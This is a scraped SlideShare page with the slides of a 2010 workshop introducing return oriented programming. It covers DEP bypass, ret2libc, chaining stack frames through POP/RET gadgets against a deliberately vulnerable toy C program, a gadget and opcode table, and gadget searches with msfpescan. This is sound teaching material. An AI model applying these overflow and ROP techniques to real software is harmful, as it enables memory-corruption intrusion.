SlideShare une entreprise Scribd logo

An introduction to ROP

Saumil Shah
Saumil Shah

Slides from my workshop at Hack.LU 2010 in Luxembourg. This workshop introduced the basic concepts of Return Oriented Programming with some hands-on exercises.

TechnologieFormation
1  sur  55
net-square Introduction to ROP a first look at return oriented programming Saumil Shah, Net-Square Hack.LU 2010 - Luxembourg
net-square Introduction • DEP • EIP control • Ret2LibC • Return Oriented Programming
net-square DEP • Hardware enforced (NX). • Data areas marked non-executable. – Stack marked non-executable. – Heap marked non-executable. • You can load your shellcode in the stack or the heap... • ...but you can't jump to it.
net-square EIP control • Stack - forbidden • Heap - forbidden • Binary - OK • DLLs - OK Program Image Heap Stack DLL DLL DLL
net-square Ret2LibC • Return to LibC. • Pioneered by Solar Designer in 1997. • EIP made to "return to a function". • Need control of the stack memory. – We usually have it.
net-square Ret2LibC - how does it work? • Create a fake frame on the stack. • After an overflowed function returns... • ...set the EIP return address to the new function. • Append the fake frame. • New function executes. – parameters consumed from the fake frame. • system("/bin/sh")
net-square Return Oriented Programming • Series of function returns. • Chained frames. • Transform EIP based primitives into stubs that can be "returned into". • ESP is the new EIP!
net-square Topics • Function calls and returns • Stack overflows revisited • Creating stack frames • Chaining frames • ESP control
net-square Calling a function • Add two ints x, y. • add(3,4) • What does the calling frame look like? void add(int x, int y) { int sum; sum = x + y; printf("%dn", sum); } int main() { add(3, 4); }
net-square Stack frame for add(3,4) frame for add() return address from add() 3 4 call add
net-square Return from add(3,4) • add() is about to return. • RET after epilogue of add(). • Where does ESP point to? – immediately before the RET • What does the stack look like?
net-square Before the RET return address from add() 3 4 ESP
net-square Another function • Stack overflow in func1. • Can we call add(5, 6) after returning from func1? void func1(char *s) { char buffer[128]; strcpy(buffer, s); } int main() { func1(argv[1]); }
net-square Stack frame for func1() buffer return address from func1 s
net-square strcpy(buffer, s) buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAA AAAA AAAA AAAA
net-square Before the RET buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAA AAAA AAAA AAAA ESP
net-square After the RET buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAA AAAA AAAA AAAA EIP = 0x41414141 ESP
net-square Return to add() • Insert a fake frame in the buffer. • Make func1() return to: add(01010101, 02020202) • What does the stack frame look like?
net-square strcpy(buffer, s) buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA address of add return address from add 01010101 02020202
net-square Before func1() returns buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA address of add return address from add 01010101 02020202 ESP
net-square Return to add() buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA address of add return address from add 01010101 02020202 ESP EIP = add()
net-square Return to add() • By carefully creating a frame... • ...we can make the program "return to our function". • We control the parameters. • We also control where to jump to after our function returns.
net-square victim2.c int main(int argc, char *argv[]) { add(3, 4); func1(argv[1]); } void func1(char *s) { char buffer[128]; strcpy(buffer, s); } void print_hello(void) { printf("Hello Worldn"); } void add(int x, int y) { int sum; sum = x + y; printf("%d + %d = %dn", x, y, sum); } stack overflow lurks here!
net-square victim2.c • Compile victim2.c • Run victim2 under a debugger • Study the stack frame before add(3, 4) gcc victim2.c -o victim2 gdb victim2
net-square gdb'ing add • Set a breakpoint before add(3, 4) 0x804836c <main>: push %ebp 0x804836d <main+1>: mov %esp,%ebp 0x804836f <main+3>: sub $0x8,%esp 0x8048372 <main+6>: and $0xfffffff0,%esp 0x8048375 <main+9>: mov $0x0,%eax 0x804837a <main+14>: sub %eax,%esp 0x804837c <main+16>: sub $0x8,%esp 0x804837f <main+19>: push $0x4 0x8048381 <main+21>: push $0x3 0x8048383 <main+23>: call 0x80483de <add> 0x8048388 <main+28>: add $0x10,%esp 0x804838b <main+31>: cmpl $0x1,0x8(%ebp)
net-square Stack frame before add(3, 4) • Dump the stack • Continue (gdb) x/64 $esp 0xbffff8ac: 0x08048388 0x00000003 0x00000004 0xbffff8c8 0xbffff8bc: 0x0804841c 0x40148f50 0x40012780 0xbffff8e8 0x08048388 3 4
net-square Overflowing func1() • Overflow func1 and... ...return to add(01010101, 02020202) • Create a fake frame. • Overwrite stack. • frame1.pl return from func1 param1 param2 return from add 0x080483de 0x01010101 0x02020202 0x42424242
net-square frame1.pl • Creates the overflow buffer as follows: • Set this in an environment variable EGG and run victim2 with $EGG: 080483deAAAAAA...140...AAAAAA 42424242 01010101 02020202 distance to EIP address of add return from add param1 param2 export EGG=`./frame1.pl` gdb victim2 (gdb) run $EGG
net-square ESP • Where will ESP be after returning from add? • Verify 080483deAAAAAA...140...AAAAAA 42424242 01010101 02020202 (gdb) x/64 $esp 0xbffff824: 0x01010101 0x02020202 0x08048400 0x40148f50 0xbffff834: 0x40012780 0xbffff858 0x4002e7f7 0x00000002 ESP
net-square Chaining functions • After add(01010101, 02020202), we want to run add(03030303, 04040404). • How should we set up the frames? • First, study the frame after add() returns.
net-square After add() returns AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA address of add 42424242 01010101 02020202 ESP EIP = 42424242
net-square Where does the new frame go? AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA address of add 42424242 01010101 02020202 address of add ?? 03030303 04040404
net-square Where does the new frame go? • We get only ONE chance at strcpy. • How do we preserve params 01010101 and 02020202? • We can only APPEND the second frame below our first frame. • We have to UNWIND the first frame before returning to the second frame. • Return to epilogue!
net-square Chaining the frames AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA address of add address of POP/POP/RET 01010101 02020202 address of add 42424242 03030303 04040404 add(01010101, 02020202) add(03030303, 04040404)
net-square Keeping ESP in control AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA address of add address of POP/POP/RET 01010101 02020202 address of add 42424242 03030303 04040404 Return from func1 Return to add() Return to POP/POP/RET POP POP ESP RET - Return to add() Finally EIP = 0x42424242
net-square frame2.pl • Creates the overflow buffer as follows: 080483deAAAAAA...140...AAAAAA 0804843d 01010101 02020202 distance to EIP address of add POP/POP /RET param1 param2 080483de 42424242 03030303 04040404 address of add return from add param1 param2 Use msfelfscan to find the address of POP/POP/RET from victim2 binary.
net-square frame2.pl • Set this in an environment variable EGG and run victim2 with $EGG: export EGG=`./frame2.pl` gdb victim2 (gdb) run $EGG Starting program: /home/user0/victim2 $EGG 3 + 4 = 7 1010101 + 2020202 = 3030303 3030303 + 4040404 = 7070707 Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? ()
net-square It's all about ESP! • ESP is the new EIP. • ROP involves keeping the ESP moving through the frames on the stack. • Frames can be chained by returning to epilogues of functions. – to appropriately unwind the parameters pushed on the stack. • We must never lose sight of RET.
net-square ROP frames - generic approach f1(A, B) f2(X) f1(C, D) f3(P, Q, R, S) f2(Y) : : & f1() & POP/POP/RET A B & f2() & POP/RET X & f3() & POPAD/RET P Q R & f1() & POP/POP/RET C D junk junk junk & f2() & POP/RET Y S
net-square Topics • Transforming classic EIP code to ROP • ROP vs. classic programming • Thinking in ROP terms • Assembling frames • Gadgets • Searching for gadgets • Generic techniques
net-square EIP vs. ESP Classic EIP code • N ops = N instructions. • EIP increments. • ESP fluctuates. • The CPU increments EIP automatically. ROP code • N ops = N frames. • ESP increments. • EIP fluctuates. • We have to control ESP through RET instructions.
net-square Transform EIP code to ROP • Load two registers • Call a function – with params 3,4 • How does this translate in ROP terms? mov eax, 14 mov ecx, 02500000 push 3 push 4 call 77fe3210
net-square Thinking in ROP terms ?? AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 ESP Put 14 in the next stack word, and POP it into EAX. RET function body epilogue prologue vulnerable function EIP mov eax, 14 RET POP EAX POP EBX functionX 700344fe 700344fd 700344ff
net-square Thinking in ROP terms 700344fe AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14ESP RET function body epilogue prologue vulnerable function EIP Jump to address of "POP EAX; RET". Search function epilogues. RET POP EAX POP EBX functionX mov eax, 14
net-square Thinking in ROP terms 700344fe ?? AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000 ESP RET function body epilogue prologue vulnerable function EIP Place 02500000 as the next stack word, to be loaded into ECX. RET POP EAX POP EBX functionX eax = 00000014 mov ecx, 02500000
net-square Thinking in ROP terms 700344fe 6d894430 AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000 RET function body epilogue prologue vulnerable function We now need an address of a "POP ECX; RET" sequence. RET POP EAX POP EBX functionX RET POP ECX functionY ESP EIP eax = 00000014 mov ecx, 02500000 6d894430 6d894431
net-square Thinking in ROP terms 700344fe 6d894430 AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000ESP RET function body epilogue prologue vulnerable function 02500000 is popped into ECX. RET POP EAX POP EBX functionX EIP RET POP ECX functionY eax = 00000014 mov ecx, 02500000
net-square Thinking in ROP terms 700344fe 6d894430 AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000 ??ESP RET function body epilogue prologue vulnerable function We now need to call a function at 77fe3210, with parameters 3, 4 RET POP EAX POP EBX functionX EIP RET POP ECX functionY push 3; push 4; call 77fe3210 eax = 00000014 ecx = 02500000
net-square Gadget Dictionary POP EAX; RET Load value into register value POP ECX; RET Read memory at address address ADD EAX,n; RET Add MOV EAX,[ECX]; RET POP EAX; RET Write value at address address POP ECX; RET value MOV [EAX],ECX; RET INC EAX; RET Increment address of function Call a function param cleanup param 1 param 2 RET NOP param N POP; POP ... RET ADD ESP,24; RET POPAD; RET POP EAX; RET Call a function pointer address CALL [EAX]; RET XCHG EAX,ESP; RET Stack flip ESP=EAX LEAVE; RET Stack flip ESP=EBP POP ESP; RET Stack flip ESP=addr address
net-square Instruction Opcodes Instruction Opcodes RET C3 RET n C2 16bits POP EAX 58 POP ECX 59 MOV EAX,[ECX] 8B 01 MOV [EAX],ECX 89 08 MOV [ECX],EAX 89 01 INC EAX 40 ADD EAX, n 83 C0 8bits
net-square Instruction Opcodes Instruction Opcodes POP EBX/EDX/ESI/EDI/EBP 5B/5A/5E/5F/5D POPAD 61 ADD ESP,24 83 C4 18 CALL [EAX] FF 10 XCHG EAX,ESP 94 LEAVE C9 (mov esp,ebp; pop ebp) POP ESP 5C
net-square Searching for Gadgets • Use msfpescan's regex search. • Example: MOV EAX,[ECX]; RET msfpescan -D -r 'x8Bx01xC3' <file> msfpescan -D -r 'x8Bx01xC2.x00' <file> msfpescan -D -r 'x8Bx01.xC3' <file> msfpescan -D -r 'x8Bx01..xC3' <file> • Sometimes you may need to improvise.
net-square Generic Techniques • Run arbitrary shellcode. • Difficult to transform entire shellcode to ROP frames. • Create a ROP loader: – Allocate RWX memory – Copy classic shellcode to this memory – Jump to shellcode • Load and run any shellcode.
net-square DEMO TIME! • Java JNLP docbase overflow • Exploiting IE8 using ROP
net-square KTHXBAI! saumil@net-square.com linked-in: saumilshah no LOLcats were harmed in preparation of these slides

Recommandé

Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacksn|u - The Open Security Community
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A PrimerSaumil Shah
 
A hands-on introduction to the ELF Object file format
A hands-on introduction to the ELF Object file formatA hands-on introduction to the ELF Object file format
A hands-on introduction to the ELF Object file formatrety61
 
DWARF Data Representation
DWARF Data RepresentationDWARF Data Representation
DWARF Data RepresentationWang Hsiangkai
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
SFO15-200: Linux kernel generic TEE driver
SFO15-200: Linux kernel generic TEE driverSFO15-200: Linux kernel generic TEE driver
SFO15-200: Linux kernel generic TEE driverLinaro
 
ELFの動的リンク
ELFの動的リンクELFの動的リンク
ELFの動的リンク7shi
 
Linux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingLinux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingAngel Boy
 

Recommandé

Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacksn|u - The Open Security Community
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A PrimerSaumil Shah
 
A hands-on introduction to the ELF Object file format
A hands-on introduction to the ELF Object file formatA hands-on introduction to the ELF Object file format
A hands-on introduction to the ELF Object file formatrety61
 
DWARF Data Representation
DWARF Data RepresentationDWARF Data Representation
DWARF Data RepresentationWang Hsiangkai
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
SFO15-200: Linux kernel generic TEE driver
SFO15-200: Linux kernel generic TEE driverSFO15-200: Linux kernel generic TEE driver
SFO15-200: Linux kernel generic TEE driverLinaro
 
ELFの動的リンク
ELFの動的リンクELFの動的リンク
ELFの動的リンク7shi
 
Linux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingLinux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingAngel Boy
 
How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
Symbolic Debugging with DWARF
Symbolic Debugging with DWARFSymbolic Debugging with DWARF
Symbolic Debugging with DWARFSamy Bahra
 
How to write a TableGen backend
How to write a TableGen backendHow to write a TableGen backend
How to write a TableGen backendMin-Yih Hsu
 
Advanced C - Part 3
Advanced C - Part 3Advanced C - Part 3
Advanced C - Part 3Emertxe Information Technologies Pvt Ltd
 
Windows kernel basic exploit
Windows kernel basic exploitWindows kernel basic exploit
Windows kernel basic exploitKyoungseok Yang
 
BPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveBPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveNetronome
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecturehugo lu
 
Part II: LLVM Intermediate Representation
Part II: LLVM Intermediate RepresentationPart II: LLVM Intermediate Representation
Part II: LLVM Intermediate RepresentationWei-Ren Chen
 
TEE - kernel support is now upstream. What this means for open source security
TEE - kernel support is now upstream. What this means for open source securityTEE - kernel support is now upstream. What this means for open source security
TEE - kernel support is now upstream. What this means for open source securityLinaro
 
Wpa supplicant introduction
Wpa supplicant introductionWpa supplicant introduction
Wpa supplicant introductionawkman
 
Assembly language
Assembly languageAssembly language
Assembly languagePiyush Jain
 
OPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build TutorialOPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build TutorialDalton Valadares
 
Introduction to Apache Hive
Introduction to Apache HiveIntroduction to Apache Hive
Introduction to Apache HiveAvkash Chauhan
 
PPL 2022 招待講演: 静的型つき函数型組版処理システムSATySFiの紹介
PPL 2022 招待講演: 静的型つき函数型組版処理システムSATySFiの紹介PPL 2022 招待講演: 静的型つき函数型組版処理システムSATySFiの紹介
PPL 2022 招待講演: 静的型つき函数型組版処理システムSATySFiの紹介T. Suwa
 
SFO15-503: Secure storage in OP-TEE
SFO15-503: Secure storage in OP-TEESFO15-503: Secure storage in OP-TEE
SFO15-503: Secure storage in OP-TEELinaro
 
Building Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCCBuilding Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCCKernel TLV
 
X / DRM (Direct Rendering Manager) Architectural Overview
X / DRM (Direct Rendering Manager) Architectural OverviewX / DRM (Direct Rendering Manager) Architectural Overview
X / DRM (Direct Rendering Manager) Architectural OverviewMoriyoshi Koizumi
 
Introduction to OpenCL (Japanese, OpenCLの基礎)
Introduction to OpenCL (Japanese, OpenCLの基礎)Introduction to OpenCL (Japanese, OpenCLの基礎)
Introduction to OpenCL (Japanese, OpenCLの基礎)Takahiro Harada
 
twlkh-linux-vsyscall-and-vdso
twlkh-linux-vsyscall-and-vdsotwlkh-linux-vsyscall-and-vdso
twlkh-linux-vsyscall-and-vdsoViller Hsiao
 
Algebraic Data Types for Data Oriented Programming - From Haskell and Scala t...
Algebraic Data Types for Data Oriented Programming - From Haskell and Scala t...Algebraic Data Types for Data Oriented Programming - From Haskell and Scala t...
Algebraic Data Types for Data Oriented Programming - From Haskell and Scala t...Philip Schwarz
 
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Miguel Arroyo
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingSaumil Shah
 

Contenu connexe

Tendances

How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
Symbolic Debugging with DWARF
Symbolic Debugging with DWARFSymbolic Debugging with DWARF
Symbolic Debugging with DWARFSamy Bahra
 
How to write a TableGen backend
How to write a TableGen backendHow to write a TableGen backend
How to write a TableGen backendMin-Yih Hsu
 
Windows kernel basic exploit
Windows kernel basic exploitWindows kernel basic exploit
Windows kernel basic exploitKyoungseok Yang
 
BPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveBPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveNetronome
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecturehugo lu
 
Part II: LLVM Intermediate Representation
Part II: LLVM Intermediate RepresentationPart II: LLVM Intermediate Representation
Part II: LLVM Intermediate RepresentationWei-Ren Chen
 
TEE - kernel support is now upstream. What this means for open source security
TEE - kernel support is now upstream. What this means for open source securityTEE - kernel support is now upstream. What this means for open source security
TEE - kernel support is now upstream. What this means for open source securityLinaro
 
Wpa supplicant introduction
Wpa supplicant introductionWpa supplicant introduction
Wpa supplicant introductionawkman
 
Assembly language
Assembly languageAssembly language
Assembly languagePiyush Jain
 
OPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build TutorialOPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build TutorialDalton Valadares
 
Introduction to Apache Hive
Introduction to Apache HiveIntroduction to Apache Hive
Introduction to Apache HiveAvkash Chauhan
 
PPL 2022 招待講演: 静的型つき函数型組版処理システムSATySFiの紹介
PPL 2022 招待講演: 静的型つき函数型組版処理システムSATySFiの紹介PPL 2022 招待講演: 静的型つき函数型組版処理システムSATySFiの紹介
PPL 2022 招待講演: 静的型つき函数型組版処理システムSATySFiの紹介T. Suwa
 
SFO15-503: Secure storage in OP-TEE
SFO15-503: Secure storage in OP-TEESFO15-503: Secure storage in OP-TEE
SFO15-503: Secure storage in OP-TEELinaro
 
Building Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCCBuilding Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCCKernel TLV
 
X / DRM (Direct Rendering Manager) Architectural Overview
X / DRM (Direct Rendering Manager) Architectural OverviewX / DRM (Direct Rendering Manager) Architectural Overview
X / DRM (Direct Rendering Manager) Architectural OverviewMoriyoshi Koizumi
 
Introduction to OpenCL (Japanese, OpenCLの基礎)
Introduction to OpenCL (Japanese, OpenCLの基礎)Introduction to OpenCL (Japanese, OpenCLの基礎)
Introduction to OpenCL (Japanese, OpenCLの基礎)Takahiro Harada
 
twlkh-linux-vsyscall-and-vdso
twlkh-linux-vsyscall-and-vdsotwlkh-linux-vsyscall-and-vdso
twlkh-linux-vsyscall-and-vdsoViller Hsiao
 
Algebraic Data Types for Data Oriented Programming - From Haskell and Scala t...
Algebraic Data Types for Data Oriented Programming - From Haskell and Scala t...Algebraic Data Types for Data Oriented Programming - From Haskell and Scala t...
Algebraic Data Types for Data Oriented Programming - From Haskell and Scala t...Philip Schwarz
 

Tendances (20)

How Functions Work
How Functions WorkHow Functions Work
How Functions Work
 
Symbolic Debugging with DWARF
Symbolic Debugging with DWARFSymbolic Debugging with DWARF
Symbolic Debugging with DWARF
 
How to write a TableGen backend
How to write a TableGen backendHow to write a TableGen backend
How to write a TableGen backend
 
Advanced C - Part 3
Advanced C - Part 3Advanced C - Part 3
Advanced C - Part 3
 
Windows kernel basic exploit
Windows kernel basic exploitWindows kernel basic exploit
Windows kernel basic exploit
 
BPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveBPF Hardware Offload Deep Dive
BPF Hardware Offload Deep Dive
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecture
 
Part II: LLVM Intermediate Representation
Part II: LLVM Intermediate RepresentationPart II: LLVM Intermediate Representation
Part II: LLVM Intermediate Representation
 
TEE - kernel support is now upstream. What this means for open source security
TEE - kernel support is now upstream. What this means for open source securityTEE - kernel support is now upstream. What this means for open source security
TEE - kernel support is now upstream. What this means for open source security
 
Wpa supplicant introduction
Wpa supplicant introductionWpa supplicant introduction
Wpa supplicant introduction
 
Assembly language
Assembly languageAssembly language
Assembly language
 
OPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build TutorialOPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build Tutorial
 
Introduction to Apache Hive
Introduction to Apache HiveIntroduction to Apache Hive
Introduction to Apache Hive
 
PPL 2022 招待講演: 静的型つき函数型組版処理システムSATySFiの紹介
PPL 2022 招待講演: 静的型つき函数型組版処理システムSATySFiの紹介PPL 2022 招待講演: 静的型つき函数型組版処理システムSATySFiの紹介
PPL 2022 招待講演: 静的型つき函数型組版処理システムSATySFiの紹介
 
SFO15-503: Secure storage in OP-TEE
SFO15-503: Secure storage in OP-TEESFO15-503: Secure storage in OP-TEE
SFO15-503: Secure storage in OP-TEE
 
Building Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCCBuilding Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCC
 
X / DRM (Direct Rendering Manager) Architectural Overview
X / DRM (Direct Rendering Manager) Architectural OverviewX / DRM (Direct Rendering Manager) Architectural Overview
X / DRM (Direct Rendering Manager) Architectural Overview
 
Introduction to OpenCL (Japanese, OpenCLの基礎)
Introduction to OpenCL (Japanese, OpenCLの基礎)Introduction to OpenCL (Japanese, OpenCLの基礎)
Introduction to OpenCL (Japanese, OpenCLの基礎)
 
twlkh-linux-vsyscall-and-vdso
twlkh-linux-vsyscall-and-vdsotwlkh-linux-vsyscall-and-vdso
twlkh-linux-vsyscall-and-vdso
 
Algebraic Data Types for Data Oriented Programming - From Haskell and Scala t...
Algebraic Data Types for Data Oriented Programming - From Haskell and Scala t...Algebraic Data Types for Data Oriented Programming - From Haskell and Scala t...
Algebraic Data Types for Data Oriented Programming - From Haskell and Scala t...
 

Similaire à An introduction to ROP

Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Miguel Arroyo
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingSaumil Shah
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on LinuxSam Bowne
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on LinuxSam Bowne
 
CNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxCNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxSam Bowne
 
CNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxCNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxSam Bowne
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughterQuinn Wilton
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJapneet Singh
 
The n00bs guide to ovs dpdk
The n00bs guide to ovs dpdkThe n00bs guide to ovs dpdk
The n00bs guide to ovs dpdkmarkdgray
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Kernel TLV
 
Windows debugging sisimon
Windows debugging sisimonWindows debugging sisimon
Windows debugging sisimonSisimon Soman
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyPriyanka Aash
 
Make ARM Shellcode Great Again
Make ARM Shellcode Great AgainMake ARM Shellcode Great Again
Make ARM Shellcode Great AgainSaumil Shah
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stackAlexandre Moneger
 
lec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdflec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdfhasan58964
 
04basic Concepts
04basic Concepts04basic Concepts
04basic ConceptsZhiwen Guo
 
Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64FFRI, Inc.
 
FPGA_Logic.pdf
FPGA_Logic.pdfFPGA_Logic.pdf
FPGA_Logic.pdfwafawafa52
 

Similaire à An introduction to ROP (20)

Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
CNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxCNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on Linux
 
CNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxCNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in Linux
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughter
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
The n00bs guide to ovs dpdk
The n00bs guide to ovs dpdkThe n00bs guide to ovs dpdk
The n00bs guide to ovs dpdk
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545
 
netLec2.pdf
netLec2.pdfnetLec2.pdf
netLec2.pdf
 
Windows debugging sisimon
Windows debugging sisimonWindows debugging sisimon
Windows debugging sisimon
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated Disassembly
 
Make ARM Shellcode Great Again
Make ARM Shellcode Great AgainMake ARM Shellcode Great Again
Make ARM Shellcode Great Again
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
lec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdflec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdf
 
test
testtest
test
 
04basic Concepts
04basic Concepts04basic Concepts
04basic Concepts
 
Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64
 
FPGA_Logic.pdf
FPGA_Logic.pdfFPGA_Logic.pdf
FPGA_Logic.pdf
 

Plus de Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksSaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSSaumil Shah
 
